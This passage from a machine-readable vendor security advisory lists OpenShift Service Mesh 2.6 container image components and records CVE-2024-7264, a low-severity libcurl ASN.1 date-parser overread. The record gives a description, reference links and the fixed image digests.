"8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", }, product_reference: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", relates_to_product_reference: "9Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64 as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", relates_to_product_reference: "9Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", relates_to_product_reference: "9Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64 as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", relates_to_product_reference: "9Base-RHOSSM-2.6", }, ], }, vulnerabilities: [ { cve: "CVE-2024-7264", cwe: { id: "CWE-125", name: "Out-of-bounds Read", }, discovery_date: "2024-07-31T04:33:09+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2301888", }, ], notes: [ { category: "description", text: "A flaw was found in libcurl, where libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an ASN.1 Generalized Time field. If a syntactically incorrect field is given, the parser can use -1 for the length of the *time fraction*, leading to a `strlen()` performed on a pointer to a heap buffer area that is not purposely NULL terminated.", title: "Vulnerability description", }, { category: "summary", text: "curl: libcurl: ASN.1 date parser overread", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability is classified as low severity because it primarily results in a heap buffer over-read rather than a direct memory corruption or code execution risk. Since the ASN.1 parsing occurs after a successful TLS handshake, the malformed certificate must first bypass the TLS library's validation, which significantly reduces the likelihood of exploitation. \n\nAdditionally, the impact is limited to a potential crash or unintended heap data exposure through CURLINFO_CERTINFO, but not arbitrary code execution. The requirement for a specific TLS backend configuration and the controlled nature of the memory read further minimize its exploitability.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-7264", }, { category: "external", summary: "RHBZ#2301888", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2301888", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-7264", url: "https://www.cve.org/CVERecord?id=CVE-2024-7264", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-7264", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-7264", }, { category: "external", summary: "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL", url: "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL", }, ], release_date: "2024-07-31T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", 